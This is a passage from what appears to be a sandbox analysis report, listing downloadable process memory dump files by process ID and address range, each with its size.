Filesize
176KB

Download
memory/672-749-0x0000021B44B20000-0x0000021B44B46000-memory.dmp

Filesize
152KB

Download
memory/672-54-0x00007FFE20470000-0x00007FFE20480000-memory.dmp

Filesize
64KB

Download
memory/940-60-0x0000029F1C1D0000-0x0000029F1C1FC000-memory.dmp

Filesize
176KB

Download
memory/940-69-0x00007FFE20470000-0x00007FFE20480000-memory.dmp

Filesize
64KB

Download
memory/940-68-0x0000029F1C1D0000-0x0000029F1C1FC000-memory.dmp

Filesize
176KB

Download
memory/940-750-0x0000029F1C1A0000-0x0000029F1C1C6000-memory.dmp

Filesize
152KB

Download
memory/940-98-0x00007FFE6048C000-0x00007FFE6048D000-memory.dmp

Filesize
4KB

Download
memory/940-97-0x0000029F1C1A0000-0x0000029F1C1C6000-memory.dmp

Filesize
152KB

Download
memory/1016-73-0x0000021459140000-0x000002145916C000-memory.dmp

Filesize
176KB

Download
memory/1016-82-0x00007FFE20470000-0x00007FFE20480000-memory.dmp

Filesize
64KB

Download
memory/1016-81-0x0000021459140000-0x000002145916C000-memory.dmp

Filesize
176KB

Download
memory/1016-99-0x00007FFE6048F000-0x00007FFE60490000-memory.dmp

Filesize
4KB

Download
memory/1016-101-0x0000021459110000-0x0000021459136000-memory.dmp

Filesize
152KB

Download
memory/1028-752-0x000001ED4EDB0000-0x000001ED4EDD6000-memory.dmp

Filesize
152KB

Download
memory/1028-130-0x000001ED4EDB0000-0x000001ED4EDD6000-memory.dmp

Filesize
152KB

Download
memory/3692-17-0x000002557CB90000-0x000002557CC80000-memory.dmp

Filesize
960KB

Download
memory/3692-361-0x000002557C980000-0x000002557C988000-memory.dmp

Filesize
32KB

Download
memory/3692-26-0x00007FFE60210000-0x00007FFE602CE000-memory.dmp

Filesize
760KB

Download
memory/3692-16-0x000002557C8B0000-0x000002557C8BA000-memory.dmp

Filesize
40KB

Download
memory/3692-15-0x000002557BE10000-0x000002557BE1E000-memory.dmp

Filesize
56KB

Download
memory/3692-21-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/3692-19-0x000002557CC80000-0x000002557CCD8000-memory.dmp

Filesize
352KB

Download
memory/3692-129-0x00007FFE423A0000-0x00007FFE42E61000-memory.dmp

Filesize
10.8MB

Download
memory/3692-12-0x00007FFE423A0000-0x00007FFE42E61000-memory.dmp

Filesize
10.8MB

Download
memory/3692-18-0x000002557C8C0000-0x000002557C934000-memory.dmp

Filesize
464KB

Download
memory/3692-730-0x00007FFE423A3000-0x00007FFE423A5000-memory.dmp

Filesize
8KB

Download
memory/3692-731-0x00007FFE423A0000-0x00007FFE42E61000-memory.dmp

Filesize
10.8MB

Download
memory/3692-748-0x00007FFE423A0000-0x00007FFE42E61000-memory.dmp

Filesize
10.8MB

Download
memory/3692-7-0x00007FFE423A0000-0x00007FFE42E61000-memory.dmp

Filesize
10.8MB

Download
memory/3692-0-0x00007FFE423A3000-0x00007FFE423A5000-memory.dmp

Filesize
8KB

Download
memory/3692-1-0x000002557C740000-0x000002557C762000-memory.dmp

Filesize
136KB

Download
memory/3692-20-0x000002557C940000-0x000002557C948000-memory.dmp

Filesize
32KB

Download